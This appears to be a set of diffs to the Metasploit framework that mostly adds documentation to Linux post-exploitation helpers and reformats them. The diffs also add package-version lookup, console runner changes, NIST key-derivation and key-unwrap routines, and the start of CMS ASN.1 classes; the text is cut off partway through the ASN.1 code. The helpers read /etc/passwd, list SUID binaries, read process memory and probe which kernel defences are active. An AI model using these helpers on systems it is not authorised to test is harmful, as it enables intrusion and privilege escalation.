+        # @raise [RuntimeError] If execution fails.
        #
        def exec_shield_enabled?
          exec_shield = read_file('/proc/sys/kernel/exec-shield').to_s.strip
@@ -206,6 +219,7 @@ module Msf
        # Returns true if unprivileged bpf is disabled
        #
        # @return [Boolean]
+        # @raise [RuntimeError] If execution fails.
        #
        def unprivileged_bpf_disabled?
          unprivileged_bpf_disabled = read_file('/proc/sys/kernel/unprivileged_bpf_disabled').to_s.strip
@@ -218,6 +232,7 @@ module Msf
        # Returns true if kernel pointer restriction is enabled
        #
        # @return [Boolean]
+        # @raise [RuntimeError] If execution fails.
        #
        def kptr_restrict?
          read_file('/proc/sys/kernel/kptr_restrict').to_s.strip.eql? '1'
@@ -229,6 +244,7 @@ module Msf
        # Returns true if dmesg restriction is enabled
        #
        # @return [Boolean]
+        # @raise [RuntimeError] If execution fails.
        #
        def dmesg_restrict?
          read_file('/proc/sys/kernel/dmesg_restrict').to_s.strip.eql? '1'
@@ -240,6 +256,7 @@ module Msf
        # Returns mmap minimum address
        #
        # @return [Integer]
+        # @raise [RuntimeError] If execution fails.
        #
        def mmap_min_addr
          mmap_min_addr = read_file('/proc/sys/vm/mmap_min_addr').to_s.strip
@@ -253,6 +270,9 @@ module Msf
        #
        # Returns true if Linux Kernel Runtime Guard (LKRG) kernel module is installed
        #
+        # @return [Boolean]
+        # @raise [RuntimeError] If execution fails.
+        #
        def lkrg_installed?
          directory?('/proc/sys/lkrg')
        rescue StandardError
@@ -262,6 +282,9 @@ module Msf
        #
        # Returns true if grsecurity is installed
        #
+        # @return [Boolean]
+        # @raise [RuntimeError] If execution fails.
+        #
        def grsec_installed?
          cmd_exec('test -c /dev/grsec && echo true').to_s.strip.include? 'true'
        rescue StandardError
@@ -271,6 +294,9 @@ module Msf
        #
        # Returns true if PaX is installed
        #
+        # @return [Boolean]
+        # @raise [RuntimeError] If execution fails.
+        #
        def pax_installed?
          read_file('/proc/self/status').to_s.include? 'PaX:'
        rescue StandardError
@@ -281,6 +307,7 @@ module Msf
        # Returns true if SELinux is installed
        #
        # @return [Boolean]
+        # @raise [RuntimeError] If execution fails.
        #
        def selinux_installed?
          cmd_exec('id').to_s.include? 'context='
@@ -292,6 +319,7 @@ module Msf
        # Returns true if SELinux is in enforcing mode
        #
        # @return [Boolean]
+        # @raise [RuntimeError] If execution fails.
        #
        def selinux_enforcing?
          return false unless selinux_installed?
@@ -310,6 +338,7 @@ module Msf
        # Returns true if Yama is installed
        #
        # @return [Boolean]
+        # @raise [RuntimeError] If execution fails.
        #
        def yama_installed?
          ptrace_scope = read_file('/proc/sys/kernel/yama/ptrace_scope').to_s.strip
@@ -324,6 +353,7 @@ module Msf
        # Returns true if Yama is enabled
        #
        # @return [Boolean]
+        # @raise [RuntimeError] If execution fails.
        #
        def yama_enabled?
          return false unless yama_installed?
@@ -332,7 +362,7 @@ module Msf
        rescue StandardError
          raise 'Could not determine Yama status'
        end
-      end # Kernel
-    end # Linux
-  end # Post
-end # Msf
+      end
+    end
+  end
+end
@@ -0,0 +1,72 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Post
+    module Linux
+      module Packages
+        include ::Msf::Post::Linux::System
+
+        #
+        # Determines the version of an installed package
+        #
+        # @param package The package name to check for
+        # @return [Rex::Version] nil if OS is not supported or package is not installed
+        #
+        def installed_package_version(package)
+          info = get_sysinfo
+
+          if ['debian', 'ubuntu'].include?(info[:distro])
+            package_version = cmd_exec("dpkg-query -f='${Version}' -W #{package}")
+            # The "no package" error is language based, but "dpkg-query:" starting is not
+            return nil if package_version.start_with?('dpkg-query:')
+
+            package_version = package_version.gsub('+', '.')
+            return Rex::Version.new(package_version)
+          elsif ['redhat', 'fedora', 'centos'].include?(info[:distro])
+            package_version = cmd_exec("rpm -q #{package}")
+            return nil unless package_version.start_with?(package)
+
+            # dnf-4.18.0-2.fc39.noarch
+            # remove package name at the beginning
+            package_version = package_version.split("#{package}-")[1]
+            # remove arch at the end
+            package_version = package_version.sub(/\.[^.]*$/, '')
+            return Rex::Version.new(package_version)
+          elsif ['solaris', 'oracle', 'freebsd'].include?(info[:distro])
+            package_version = cmd_exec("pkg info #{package}")
+            return nil unless package_version.include?('Version')
+
+            package_version = package_version.match(/Version\s+:\s+(.+)/)[1]
+            return Rex::Version.new(package_version)
+          elsif ['gentoo'].include?(info[:distro])
+            # https://wiki.gentoo.org/wiki/Equery
+            if command_exists?('equery')
+              package_version = cmd_exec("equery --quiet list #{package}")
+            # https://wiki.gentoo.org/wiki/Q_applets
+            elsif command_exists?('qlist')
+              package_version = cmd_exec("qlist -Iv #{package}")
+            else
+              vprint_error("installed_package_version couldn't find qlist and equery on gentoo")
+              return nil
+            end
+            return nil if package_version.strip.empty?
+
+            package_version = package_version.split('/')[1]
+            # make gcc-1.1 to 1.1
+            package_version = package_version.sub(/.*?-/, '')
+            return Rex::Version.new(package_version)
+          elsif ['arch'].include?(info[:distro])
+            package_version = cmd_exec("pacman -Qi #{package}")
+            return nil unless package_version.include?('Version')
+
+            package_version = package_version.match(/Version\s+:\s+(.+)/)[1]
+            return Rex::Version.new(package_version)
+          else
+            vprint_error("installed_package_version is being called on an unsupported OS: #{info[:distro]}")
+          end
+          nil
+        end
+      end
+    end
+  end
+end
@@ -1,125 +1,198 @@
 # -*- coding: binary -*-

 module Msf
-class Post
-module Linux
-module Priv
-  include ::Msf::Post::Common
+  class Post
+    module Linux
+      module Priv
+        include ::Msf::Post::Common
+        include ::Msf::Post::File

-  #
-  # Returns true if running as root, false if not.
-  # @return [Boolean]
-  #
-  def is_root?
-    if command_exists?('id')
-      user_id = cmd_exec('id -u')
-      clean_user_id = user_id.to_s.gsub(/[^\d]/, '')
-      if clean_user_id.empty?
-        raise "Could not determine UID: #{user_id.inspect}"
-      end
-      return (clean_user_id == '0')
-    end
-    user = whoami
-    data = cmd_exec('while read line; do echo $line; done </etc/passwd')
-    data.each_line do |line|
-      line = line.split(':')
-      return true if line[0] == user && line[3].to_i == 0
-    end
-    false
-  end
+        #
+        # Returns true if running as root, false if not.
+        #
+        # @return [Boolean]
+        # @raise [RuntimeError] If execution fails.
+        #
+        def is_root?
+          if command_exists?('id')
+            user_id = cmd_exec('id -u')
+            clean_user_id = user_id.to_s.gsub(/[^\d]/, '')
+            if clean_user_id.empty?
+              raise "Could not determine UID: #{user_id.inspect}"
+            end

-  #
-  # Multiple functions to simulate native commands added
-  #
+            return (clean_user_id == '0')
+          end
+          user = whoami
+          data = cmd_exec('while read line; do echo $line; done </etc/passwd')
+          data.each_line do |line|
+            line = line.split(':')
+            return true if line[0] == user && line[3].to_i == 0
+          end
+          false
+        end

-  def touch_cmd(new_path_file)
-    cmd_exec("> #{new_path_file}")
-  end
+        #
+        # Multiple functions to simulate native commands added
+        #

-  def cp_cmd(origin_file, final_file)
-    file_origin = read_file(origin_file)
-    cmd_exec("echo '#{file_origin}' > #{final_file}")
-  end
+        #
+        # Creates an empty file at the specified path using the touch command
+        #
+        # @param new_path_file [String] the path to the new file to be created
+        # @return [String] the output of the command
+        #
+        def touch_cmd(new_path_file)
+          cmd_exec("> #{new_path_file}")
+        end

-  def binary_of_pid(pid)
-    binary = read_file("/proc/#{pid}/cmdline")
-    if binary == "" #binary.empty?
-      binary = read_file("/proc/#{pid}/comm")
-    end
-    if binary[-1] == "\n"
-      binary = binary.split("\n")[0]
-    end
-    return binary
-  end
+        #
+        # Copies the content of one file to another using a command execution
+        #
+        # @param origin_file [String] the path to the source file
+        # @param final_file [String] the path to the destination file
+        # @return [String] the output of the command
+        #
+        def cp_cmd(origin_file, final_file)
+          file_origin = read_file(origin_file)
+          cmd_exec("echo '#{file_origin}' > '#{final_file}'")
+        end

-  def seq(first, increment, last)
-      result = []
-      (first..last).step(increment) do |i|
-        result.insert(-1, i)
-      end
-      return result
-  end
+        #
+        # Retrieves the binary name of a process given its PID
+        #
+        # @param pid [Integer] the process ID
+        # @return [String] the binary name of the process
+        #
+        def binary_of_pid(pid)
+          binary = read_file("/proc/#{pid}/cmdline")
+          if binary == '' # binary.empty?
+            binary = read_file("/proc/#{pid}/comm")
+          end
+          if binary[-1] == "\n"
+            binary = binary.split("\n")[0]
+          end
+          return binary
+        end

-  def wc_cmd(file)
-      [nlines_file(file), nwords_file(file), nchars_file(file), file]
-  end
+        #
+        # Generates a sequence of numbers from `first` to `last` with a given `increment`
+        #
+        # @param first [Integer] the starting number of the sequence
+        # @param increment [Integer] the step increment between each number in the sequence
+        # @param last [Integer] the ending number of the sequence
+        # @return [Array<Integer>] an array containing the sequence of numbers
+        #
+        def seq(first, increment, last)
+          result = []
+          (first..last).step(increment) do |i|
+            result.insert(-1, i)
+          end
+          return result
+        end

-  def nchars_file(file)
-    nchars = 0
-    lines = read_file(file).split("\n")
-    nchars = lines.length()
-    lines.each do |line|
-      line.gsub(/[ ]/, ' ' => '')
-      nchars_line = line.length()
-      nchars = nchars + nchars_line
-    end
-    return nchars
-  end
+        #
+        # Returns the number of lines, words, and characters in a file
+        #
+        # @param file [String] the path to the file
+        # @return [Array<Integer, Integer, Integer, String>] an array containing the number of lines, words, characters, and the file name
+        #
+        def wc_cmd(file)
+          [nlines_file(file), nwords_file(file), nchars_file(file), file]
+        end

-  def nwords_file(file)
-    nwords = 0
-    lines = read_file(file).split("\n")
-    lines.each do |line|
-      words = line.split(" ")
-      nwords_line = words.length()
-      nwords = nwords + nwords_line
-    end
-    return nwords
-  end
+        #
+        # Returns the number of characters in a file
+        #
+        # @param file [String] the path to the file
+        # @return [Integer] the number of characters in the file
+        #
+        def nchars_file(file)
+          nchars = 0
+          lines = read_file(file).split("\n")
+          nchars = lines.length
+          lines.each do |line|
+            line.gsub(/ /, ' ' => '')
+            nchars_line = line.length
+            nchars += nchars_line
+          end
+          nchars
+        end

-  def nlines_file(file)
-    lines = read_file(file).split("\n")
-    nlines = lines.length()
-    return nlines
-  end
+        #
+        # Returns the number of words in a file
+        #
+        # @param file [String] the path to the file
+        # @return [Integer] the number of words in the file
+        #
+        def nwords_file(file)
+          nwords = 0
+          lines = read_file(file).split("\n")
+          lines.each do |line|
+            words = line.split(' ')
+            nwords_line = words.length
+            nwords += nwords_line
+          end
+          return nwords
+        end

-  def head_cmd(file, nlines)
-    lines = read_file(file).split("\n")
-    result = lines[0..nlines-1]
-    return result
-  end
+        #
+        # Returns the number of lines in a file
+        #
+        # @param file [String] the path to the file
+        # @return [Integer] the number of lines in the file
+        #
+        def nlines_file(file)
+          lines = read_file(file).split("\n")
+          nlines = lines.length
+          return nlines
+        end

-  def tail_cmd(file, nlines)
-    lines = read_file(file).split("\n")
-    result = lines[-1*(nlines)..-1]
-    return result
-  end
+        #
+        # Returns the first `n` lines of a file
+        #
+        # @param file [String] the path to the file
+        # @param nlines [Integer] the number of lines to return
+        # @return [Array<String>] an array containing the first `n` lines of the file
+        #
+        def head_cmd(file, nlines)
+          lines = read_file(file).split("\n")
+          result = lines[0..nlines - 1]
+          return result
+        end

-  def grep_cmd(file, string)
-    result = []
-    lines = read_file(file).split("\n")
+        #
+        # Returns the last `n` lines of a file
+        #
+        # @param file [String] the path to the file
+        # @param nlines [Integer] the number of lines to return
+        # @return [Array<String>] an array containing the last `n` lines of the file
+        #
+        def tail_cmd(file, nlines)
+          lines = read_file(file).split("\n")
+          result = lines[-1 * nlines..]
+          return result
+        end

-    lines.each do |line|
-      if line.include?(string)
-        result.insert(-1, line)
+        #
+        # Searches for a specific string in a file and returns the lines that contain the string
+        #
+        # @param file [String] the path to the file
+        # @param string [String] the string to search for
+        # @return [Array<String>] an array containing the lines that include the specified string
+        #
+        def grep_cmd(file, string)
+          result = []
+          lines = read_file(file).split("\n")
+
+          lines.each do |line|
+            if line.include?(string)
+              result.insert(-1, line)
+            end
+          end
+          return result
+        end
      end
    end
-    return result
  end
-
-
-
-end # Priv
-end # Linux
-end # Post
-end # Msf
+end
@@ -1,36 +1,42 @@
 # -*- coding: binary -*-

+require 'rex/post'

 module Msf
-class Post
-module Linux
+  class Post
+    module Linux
+      module Process
+        include Msf::Post::Process

-module Process
+        def initialize(info = {})
+          super(
+            update_info(
+              info,
+              'Compat' => {
+                'Meterpreter' => {
+                  'Commands' => %w[
+                    stdapi_sys_process_attach
+                    stdapi_sys_process_memory_read
+                  ]
+                }
+              }
+            )
+          )
+        end

-  include Msf::Post::Process
-
-  def initialize(info = {})
-    super(
-      update_info(
-        info,
-        'Compat' => {
-          'Meterpreter' => {
-            'Commands' => %w[
-              stdapi_sys_process_attach
-              stdapi_sys_process_memory_read
-            ]
-          }
-        }
-      )
-    )
+        #
+        # Reads a specified length of memory from a given base address of a process
+        #
+        # @param base_address [Integer] the starting address to read from
+        # @param length [Integer] the number of bytes to read
+        # @param pid [Integer] the process ID (optional, default is 0)
+        # @return [String] the read memory content
+        #
+        def mem_read(base_address, length, pid: 0)
+          proc_id = session.sys.process.open(pid, PROCESS_READ)
+          proc_id.memory.read(base_address, length)
+        end
+      end
+    end
  end
-
-  def mem_read(base_address, length, pid: 0)
-    proc_id = session.sys.process.open(pid, PROCESS_READ)
-    data = proc_id.memory.read(base_address, length)
-  end
-
-end # Process
-end # Linux
-end # Post
-end # Msf
+end
@@ -7,6 +7,7 @@ module Msf
        include ::Msf::Post::Common
        include ::Msf::Post::File
        include ::Msf::Post::Unix
+        include Msf::Auxiliary::Report

        #
        # Returns a Hash containing Distribution Name, Version and Kernel Information
@@ -14,12 +15,38 @@ module Msf
        def get_sysinfo
          system_data = {}
          etc_files = cmd_exec('ls /etc').split
-
          kernel_version = cmd_exec('uname -a')
          system_data[:kernel] = kernel_version

-          # Debian
-          if etc_files.include?('debian_version')
+          # The order of these checks is important.
+          # * Checks for Arch-based distros must be performed before the check for Arch.
+          # * Checks for Antix-based distros must be performed before the check for Antix.
+          # * Checks for Debian-based distros must be performed before the check for Debian.
+          # * Checks for distros which ship with '/etc/system-release' must be performed
+          #   prior to the 'system-release' check.
+          # * Checks for distros which ship with '/etc/issue' must be performed
+          #   prior to the Generic 'issue' check.
+
+          # MX Linux
+          if etc_files.include?('mx-version')
+            version = read_file('/etc/mx-version').gsub(/\n|\\n|\\l/, '').strip
+            system_data[:distro] = 'mxlinux'
+            system_data[:version] = version
+
+          # AntiX
+          elsif etc_files.include?('antix-version')
+            version = read_file('/etc/antix-version').gsub(/\n|\\n|\\l/, '').strip
+            system_data[:distro] = 'antix'
+            system_data[:version] = version
+
+          # OpenMandriva
+          elsif etc_files.include?('openmandriva-release')
+            version = read_file('/etc/openmandriva-release').gsub(/\n|\\n|\\l/, '').strip
+            system_data[:distro] = 'openmandriva'
+            system_data[:version] = version
+
+          # Debian / Ubuntu (and forks)
+          elsif etc_files.include?('debian_version')
            version = read_file('/etc/issue').gsub(/\n|\\n|\\l/, '').strip
            if kernel_version =~ /Ubuntu/
              system_data[:distro] = 'ubuntu'
@@ -64,6 +91,12 @@ module Msf
            system_data[:distro] = 'redhat'
            system_data[:version] = version

+          # Manjaro
+          elsif etc_files.include?('manjaro-release')
+            version = read_file('/etc/manjaro-release').gsub(/\n|\\n|\\l/, '').strip
+            system_data[:distro] = 'manjaro'
+            system_data[:version] = version
+
          # Arch
          elsif etc_files.include?('arch-release')
            version = read_file('/etc/arch-release').gsub(/\n|\\n|\\l/, '').strip
@@ -132,8 +165,10 @@ module Msf
        # Gathers all SUID files on the filesystem.
        # NOTE: This uses the Linux `find` command. It will most likely take a while to get all files.
        # Consider specifying a more narrow find path.
+        #
        # @param findpath The path on the system to start searching
        # @return [Array]
+        #
        def get_suid_files(findpath = '/')
          cmd_exec("find #{findpath} -perm -4000 -print -xdev").to_s.split("\n").delete_if { |i| i.include? 'Permission denied' }
        rescue StandardError
@@ -142,7 +177,9 @@ module Msf

        #
        # Gets the $PATH environment variable
+        #
        # @return [String]
+        #
        def get_path
          cmd_exec('echo $PATH').to_s
        rescue StandardError
@@ -151,6 +188,7 @@ module Msf

        #
        # Gets basic information about the system's CPU.
+        #
        # @return [Hash]
        #
        def get_cpu_info
@@ -171,6 +209,7 @@ module Msf

        #
        # Gets the hostname of the system
+        #
        # @return [String]
        #
        def get_hostname
@@ -188,6 +227,7 @@ module Msf

        #
        # Gets the name of the current shell
+        #
        # @return [String]
        #
        def get_shell_name
@@ -202,6 +242,7 @@ module Msf

        #
        # Gets the pid of the current shell
+        #
        # @return [String]
        #
        def get_shell_pid
@@ -210,6 +251,7 @@ module Msf

        #
        # Checks if the system has gcc installed
+        #
        # @return [Boolean]
        #
        def has_gcc?
@@ -220,6 +262,7 @@ module Msf

        #
        # Checks if the system has clang installed
+        #
        # @return [Boolean]
        #
        def has_clang?
@@ -230,6 +273,7 @@ module Msf

        #
        # Checks if `file_path` is mounted on a noexec mount point
+        #
        # @return [Boolean]
        #
        def noexec?(file_path)
@@ -245,6 +289,7 @@ module Msf

        #
        # Checks if `file_path` is mounted on a nosuid mount point
+        #
        # @return [Boolean]
        #
        def nosuid?(file_path)
@@ -260,6 +305,7 @@ module Msf

        #
        # Checks for protected hardlinks on the system
+        #
        # @return [Boolean]
        #
        def protected_hardlinks?
@@ -270,6 +316,7 @@ module Msf

        #
        # Checks for protected symlinks on the system
+        #
        # @return [Boolean]
        #
        def protected_symlinks?
@@ -280,18 +327,22 @@ module Msf

        #
        # Gets the version of glibc
+        #
        # @return [String]
        #
        def glibc_version
          raise 'glibc is not installed' unless command_exists? 'ldd'
+          begin

-          cmd_exec('ldd --version').scan(/^ldd\s+\(.*\)\s+([\d.]+)/).flatten.first
-        rescue StandardError
-          raise 'Could not determine glibc version'
+            cmd_exec('ldd --version').scan(/^ldd\s+\(.*\)\s+([\d.]+)/).flatten.first
+          rescue StandardError
+            raise 'Could not determine glibc version'
+          end
        end

        #
        # Gets the mount point of `filepath`
+        #
        # @param [String] filepath The filepath to get the mount point
        # @return [String]
        #
@@ -303,6 +354,7 @@ module Msf

        #
        # Gets all the IP directions of the device
+        #
        # @return [Array]
        #
        def ips
@@ -323,6 +375,7 @@ module Msf

        #
        # Gets all the interfaces of the device
+        #
        # @return [Array]
        #
        def interfaces
@@ -338,6 +391,7 @@ module Msf

        #
        # Gets all the macs of the device
+        #
        # @return [Array]
        #
        def macs
@@ -354,9 +408,10 @@ module Msf
          result
        end

-        # Parsing information based on: https://github.com/sensu-plugins/sensu-plugins-network-checks/blob/master/bin/check-netstat-tcp.rb
        #
+        # Parsing information based on: https://github.com/sensu-plugins/sensu-plugins-network-checks/blob/master/bin/check-netstat-tcp.rb
        # Gets all the listening tcp ports in the device
+        #
        # @return [Array]
        #
        def listen_tcp_ports
@@ -377,8 +432,8 @@ module Msf
        end

        # Parsing information based on: https://github.com/sensu-plugins/sensu-plugins-network-checks/blob/master/bin/check-netstat-tcp.rb
-        #
        # Gets all the listening udp ports in the device
+        #
        # @return [Array]
        #
        def listen_udp_ports
@@ -400,6 +455,7 @@ module Msf

        #
        # Determine if system is a container
+        #
        # @return [String]
        #
        def get_container_type
@@ -421,6 +477,8 @@ module Msf
                return 'Docker'
              when /lxc/i
                return 'LXC'
+              else
+                return 'Unknown'
              end
            else
              # Check for the "container" environment variable
@@ -443,11 +501,7 @@ module Msf
          end
          container_type
        end
-        # System
      end
-      # Linux
    end
-    # Post
  end
-  # Msf
 end
@@ -187,9 +187,17 @@ module Session
  # exploit instance. Store references from and to the exploit module.
  #
  def set_from_exploit(m)
+    target_host = nil
+    unless m.target_host.blank?
+      # only propagate the target_host value if it's exactly 1 host
+      if (rw = Rex::Socket::RangeWalker.new(m.target_host)).length == 1
+        target_host = rw.next_ip
+      end
+    end
+
    self.via = { 'Exploit' => m.fullname }
    self.via['Payload'] = ('payload/' + m.datastore['PAYLOAD'].to_s) if m.datastore['PAYLOAD']
-    self.target_host = Rex::Socket.getaddress(m.target_host) if (m.target_host.to_s.strip.length > 0)
+    self.target_host = target_host
    self.target_port = m.target_port if (m.target_port.to_i != 0)
    self.workspace   = m.workspace
    self.username    = m.owner
@@ -60,16 +60,9 @@ class Auxiliary
    rhosts = mod_with_opts.datastore['RHOSTS']
    rhosts_walker = Msf::RhostsWalker.new(rhosts, mod_with_opts.datastore)

-    begin
-      mod_with_opts.validate
-    rescue ::Msf::OptionValidateError => e
-      ::Msf::Ui::Formatter::OptionValidateError.print_error(mod_with_opts, e)
-      return false
-    end
-
    begin
      # Check if this is a scanner module or doesn't target remote hosts
-      if rhosts.blank? || mod.class.included_modules.include?(Msf::Auxiliary::Scanner)
+      if rhosts.blank? || mod.class.included_modules.include?(Msf::Auxiliary::MultipleTargetHosts)
        mod_with_opts.run_simple(
          'Action'         => args[:action],
          'LocalInput'     => driver.input,
@@ -79,6 +72,8 @@ class Auxiliary
        )
      # For multi target attempts with non-scanner modules.
      else
+        # When RHOSTS is split, the validation changes slightly, so perform it reports the host the validation failed for
+        mod_with_opts.validate
        rhosts_walker.each do |datastore|
          mod_with_opts = mod.replicant
          mod_with_opts.datastore.merge!(datastore)
@@ -102,15 +97,14 @@ class Auxiliary
    rescue ::Interrupt
      print_error("Auxiliary interrupted by the console user")
    rescue ::Msf::OptionValidateError => e
-      ::Msf::Ui::Formatter::OptionValidateError.print_error(running_mod, e)
+      ::Msf::Ui::Formatter::OptionValidateError.print_error(mod_with_opts, e)
+      return false
    rescue ::Exception => e
      print_error("Auxiliary failed: #{e.class} #{e}")
-      if(e.class.to_s != 'Msf::OptionValidateError')
-        print_error("Call stack:")
-        e.backtrace.each do |line|
-          break if line =~ /lib.msf.base.simple/
-          print_error("  #{line}")
-        end
+      print_error("Call stack:")
+      e.backtrace.each do |line|
+        break if line =~ /lib.msf.base.simple/
+        print_error("  #{line}")
      end

      return false
@@ -40,9 +40,9 @@ class Exploit
  #
  # Launches an exploitation single attempt.
  #
-  def exploit_single(mod, opts)
+  def exploit_single(mod, opts, &block)
    begin
-      session = mod.exploit_simple(opts)
+      session = mod.exploit_simple(opts, &block)
    rescue ::Interrupt
      raise $!
    rescue ::Msf::OptionValidateError => e
@@ -136,21 +136,16 @@ class Exploit
      'Quiet'       => args[:quiet] || false
    }

-    begin
-      mod_with_opts.validate
-    rescue ::Msf::OptionValidateError => e
-      ::Msf::Ui::Formatter::OptionValidateError.print_error(mod_with_opts, e)
-      return false
-    end
-
    driver.run_single('reload_lib -a') if args[:reload_libs]

-    if rhosts && has_rhosts_option
+    if rhosts && has_rhosts_option && !mod.class.included_modules.include?(Msf::Auxiliary::MultipleTargetHosts)
      rhosts_walker = Msf::RhostsWalker.new(rhosts, mod_with_opts.datastore)
      rhosts_walker_count = rhosts_walker.count
      rhosts_walker = rhosts_walker.to_enum
    end

+    run_mod = nil
+
    # For multiple targets exploit attempts.
    if rhosts_walker && rhosts_walker_count > 1
      opts[:multi] = true
@@ -163,7 +158,7 @@ class Exploit
        # Catch the interrupt exception to stop the whole module during exploit
        begin
          print_status("Exploiting target #{datastore['RHOSTS']}")
-          session = exploit_single(nmod, opts)
+          session = exploit_single(nmod, opts) { |mod| run_mod = mod }
        rescue ::Interrupt
          print_status("Stopping exploiting current target #{datastore['RHOSTS']}...")
          print_status("Control-C again to force quit exploiting all targets.")
@@ -185,7 +180,7 @@ class Exploit
      if rhosts_walker && rhosts_walker_count == 1
        nmod.datastore.merge!(rhosts_walker.next)
      end
-      session = exploit_single(nmod, opts)
+      session = exploit_single(nmod, opts) { |mod| run_mod = mod }
      # If we were given a session, let's see what we can do with it
      if session
        any_session = true
@@ -211,7 +206,7 @@ class Exploit
    end

    # If we didn't get any session and exploit ended launch.
-    unless any_session
+    unless any_session || run_mod&.error.is_a?(Msf::OptionValidateError)
    # If we didn't run a payload handler for this exploit it doesn't
    # make sense to complain to the user that we didn't get a session
      unless mod_with_opts.datastore["DisablePayloadHandler"]
@@ -380,7 +380,7 @@ module Msf
            print_line
            print_line "Keywords:"
            {
-              'adapter'     => 'Modules with a matching adater reference name',
+              'adapter'     => 'Modules with a matching adapter reference name',
              'aka'         => 'Modules with a matching AKA (also-known-as) name',
              'author'      => 'Modules written by this author',
              'arch'        => 'Modules affecting this architecture',
@@ -298,7 +298,9 @@ class MsfAutoload
      'uds_errors' => 'UDSErrors',
      'smb_hash_capture' => 'SMBHashCapture',
      'rex_ntlm' => 'RexNTLM',
-      'teamcity' => 'TeamCity'
+      'teamcity' => 'TeamCity',
+      'nist_sp_800_38f' => 'NIST_SP_800_38f',
+      'nist_sp_800_108' => 'NIST_SP_800_108'
    }
  end

@@ -0,0 +1,3 @@
+module Rex::Crypto::KeyDerivation
+  require 'rex/crypto/key_derivation/nist_sp_800_108'
+end
@@ -0,0 +1,45 @@
+require 'openssl'
+
+module Rex::Crypto::KeyDerivation::NIST_SP_800_108
+
+  # Generates key material using the NIST SP 800-108 R1 counter mode KDF.
+  #
+  # @param length [Integer] The desired output length of each key in bytes.
+  # @param prf [Proc] The pseudorandom function used for key derivation.
+  # @param keys [Integer] The number of derived keys to generate.
+  # @param label [String] Optional label to distinguish different derivations.
+  # @param context [String] Optional context to bind the key derivation to specific information.
+  #
+  # @return [Array<String>] An array of derived keys as binary strings, regardless of the number requested.
+  def self.counter(length, prf, keys: 1, label: ''.b, context: ''.b)
+    key_block = ''
+
+    counter = 0
+    while key_block.length < (length * keys)
+      counter += 1
+      raise RangeError.new("counter overflow") if counter > 0xffffffff
+
+      info = [ counter ].pack('L>') + label + "\x00".b + context + [ length * keys * 8 ].pack('L>')
+      key_block << prf.call(info)
+    end
+
+    key_block.bytes.each_slice(length).to_a[...keys].map { |slice| slice.pack('C*') }
+  end
+
+  # Generates key material using the NIST SP 800-108 R1 counter mode KDF with HMAC.
+  #
+  # @param secret [String] The secret key used as the HMAC key.
+  # @param length [Integer] The desired output length of each key in bytes.
+  # @param algorithm [String, Symbol] The HMAC hash algorithm (e.g., `SHA256`, `SHA512`).
+  # @param keys [Integer] The number of derived keys to generate (default: 1).
+  # @param label [String] Optional label to distinguish different derivations.
+  # @param context [String] Optional context to bind the key derivation to specific information.
+  #
+  # @return [Array<String>] Returns an array of derived keys.
+  #
+  # @raise [ArgumentError] If the requested length is invalid or the algorithm is unsupported.
+  def self.counter_hmac(secret, length, algorithm, keys: 1, label: ''.b, context: ''.b)
+    prf = -> (data) { OpenSSL::HMAC.digest(algorithm, secret, data) }
+    counter(length, prf, keys: keys, label: label, context: context)
+  end
+end
@@ -0,0 +1,3 @@
+module Rex::Crypto::KeyWrap
+  require 'rex/crypto/key_wrap/nist_sp_800_38f'
+end
@@ -0,0 +1,52 @@
+# see: [NIST SP 800-38F, Section 6.2](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-38F.pdf)
+module Rex; end
+module Rex::Crypto; end
+module Rex::Crypto::KeyWrap; end
+
+module Rex::Crypto::KeyWrap::NIST_SP_800_38f
+
+  # Performs AES key unwrapping from NIST SP 800-38F.
+  #
+  # @param kek [String] The key-encryption key (KEK) used to unwrap the ciphertext.
+  # @param key_data [String] The wrapped key data.
+  # @param authenticate [Boolean] Whether to check the data integrity or not.
+  # @return [String, nil] The unwrapped key on success, or nil if unwrapping fails.
+  #
+  # @see https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-38F.pdf
+  def self.aes_unwrap(kek, key_data, authenticate: true)
+    # padded mode as described in Section 6.3 is not supported at this time
+    raise Rex::ArgumentError.new('kek must be 16, 24 or 32-bytes long') unless [16, 24, 32].include?(kek.length)
+    raise Rex::ArgumentError.new('key_data length must be a multiple of 8') unless key_data.length % 8 == 0
+    icv1 = ("\xa6".b * 8)
+
+    r = key_data.bytes.each_slice(8).map { |c| c.pack('C*') }
+    a = r.shift
+
+    ciph = -> (data) do
+      # per-section 5.1, AES is the only suitable block cipher
+      cipher = OpenSSL::Cipher::AES.new(kek.length * 8, :ECB).decrypt
+      cipher.key = kek
+      cipher.padding = 0
+      cipher.update(data)
+    end
+
+    n = r.length
+
+    5.downto(0) do |j|
+      (n - 1).downto(0) do |i|
+        atr = [a.unpack1('Q>') ^ ((n * j) + i + 1)].pack('Q>') + r[i]
+
+        b = ciph.call(atr)
+        a = b[...8]
+        r[i] = b[-8...]
+      end
+    end
+
+    # setting authenticate to true effectively switches the operation from Section 6.2 algorithm #2 to algorithm #4
+    if authenticate && a != icv1
+      raise Rex::RuntimeError.new('ICV1 integrity check failed in KW-AD(C)')
+    end
+
+    r.join('')
+  end
+end
@@ -0,0 +1,252 @@
+module Rex::Proto::CryptoAsn1::Cms
+  class Attribute < RASN1::Model
+    sequence :attribute,
+             content: [objectid(:attribute_type),
+                       set_of(:attribute_values, RASN1::Types::Any)
+    ]
+  end
+
+  class Certificate
+    # Rather than specifying the entire structure of a certificate, we pass this off
+    # to OpenSSL, effectively providing an interface between RASN and OpenSSL.
+
+    attr_accessor :options
+
+    def initialize(options={})
+      self.options = options
+    end
+
+    def to_der
+      self.options[:openssl_certificate]&.to_der || ''
+    end
+
+    # RASN1 Glue method - Say if DER can be built (not default value, not optional without value, has a value)
+    # @return [Boolean]
+    # @since 0.12
+    def can_build?
+      !to_der.empty?
+    end
+
+    # RASN1 Glue method
+    def primitive?
+      false
+    end
+
+    # RASN1 Glue method
+    def value
+      options[:openssl_certificate]
+    end
+
+    def parse!(str, ber: false)
+      self.options[:openssl_certificate] = OpenSSL::X509::Certificate.new(str)
+      to_der.length
+    end
+  end
+
+  class AlgorithmIdentifier < RASN1::Model
+    sequence :algorithm_identifier,
+             content: [objectid(:algorithm),
+                       any(:parameters, optional: true)
+    ]
+  end
+
+  class KeyDerivationAlgorithmIdentifier < AlgorithmIdentifier
+  end
+
+  class KeyEncryptionAlgorithmIdentifier < AlgorithmIdentifier
+  end
+
+  class ContentEncryptionAlgorithmIdentifier < AlgorithmIdentifier
+  end
+
+  class OriginatorInfo < RASN1::Model
+    sequence :originator_info,
